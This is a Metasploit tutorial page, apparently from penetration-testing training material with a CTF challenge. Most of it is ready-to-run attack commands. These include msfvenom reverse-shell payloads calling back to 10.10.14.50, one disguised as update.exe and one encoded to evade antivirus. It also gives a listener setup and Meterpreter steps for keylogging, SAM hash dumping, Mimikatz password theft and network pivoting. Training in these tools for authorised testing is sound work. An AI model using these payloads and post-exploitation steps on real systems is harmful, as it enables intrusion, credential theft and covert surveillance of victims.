Metasploit Framework: Advanced Exploitation

Metasploit Framework (MSF) is the most widely used offensive security exploitation platform. Beyond launching public exploits, its true power lies in session management, payload crafting, and network routing (Pivoting).

1. Database and Workspace Management

# Start PostgreSQL in Linux:
systemctl start postgresql
msfdb init

# Inside msfconsole:
db_status                # Verify connection
workspace -a CorpX       # Create an isolated workspace
workspace CorpX          # Switch to it

# Run Nmap and save results directly to MSF DB:
db_nmap -sV -p- 192.168.1.50

# View gathered intelligence:
hosts | services | creds | vulns

2. The Core Concept: Staged vs Stageless Payloads

Staged Payload: E.g. windows/x64/meterpreter/reverse_tcp (Notice the /). Sends a tiny stager that connects back to you to download the rest of Meterpreter into memory. Ideal for Buffer Overflows with tight space.
Stageless Payload: E.g. windows/x64/meterpreter_reverse_tcp (Notice the _). Contains the entire Meterpreter binary. Larger, but more stable and evades firewalls better because it doesn't drop the connection to download a second stage.

🔴 Msfvenom Crafter Simulator

You are facing a corporate firewall that drops two-stage connections. You need to generate a Stageless Payload for a 64-bit Windows system. Construct the exact msfvenom command to secure your initial shell.

>_ START CTF 21 CHALLENGE

3. Creating Payloads with msfvenom

# Windows EXE Payload (Stageless - Reliable):
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -f exe -o update.exe

# Linux ELF Payload (Staged):
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -f elf -o linux_shell

# Using Encoders for AV Evasion (Shikata_ga_nai, 3 iterations):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded.exe

4. Listener Setup (multi/handler)

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_tcp
msf6 > set LHOST 10.10.14.50
msf6 > set LPORT 4444
msf6 > exploit -j     # -j runs listener in the background

5. Meterpreter — Advanced Post-Exploitation

sysinfo
getuid                 # Check privileges (Target: NT AUTHORITY\SYSTEM)
migrate 1432           # Migrate payload to Explorer.exe memory space

shell                  # Drop to native OS shell
upload /local/file.exe C:\Windows\Temp\
keyscan_start          # Start keylogger

hashdump               # Extract Windows SAM hashes (Requires SYSTEM)
load kiwi              # Load Mimikatz into memory
creds_all              # Run Mimikatz to steal cleartext RAM passwords

6. Pivoting (Network Routing)

If you compromise Server A and discover it has access to an internal isolated DB, you must route your Metasploit traffic through Server A's session.

# 1. Background the Meterpreter session:
meterpreter > background

# 2. Route all traffic to the 10.x.x.x network through session 1:
msf6 > route add 10.0.0.0/24 1

# 3. Port Forwarding (Bring internal port 3306 to local port 13306):
meterpreter > portfwd add -l 13306 -p 3306 -r 10.0.0.5

Metasploit Framework: Exploitation & Post-Exploitation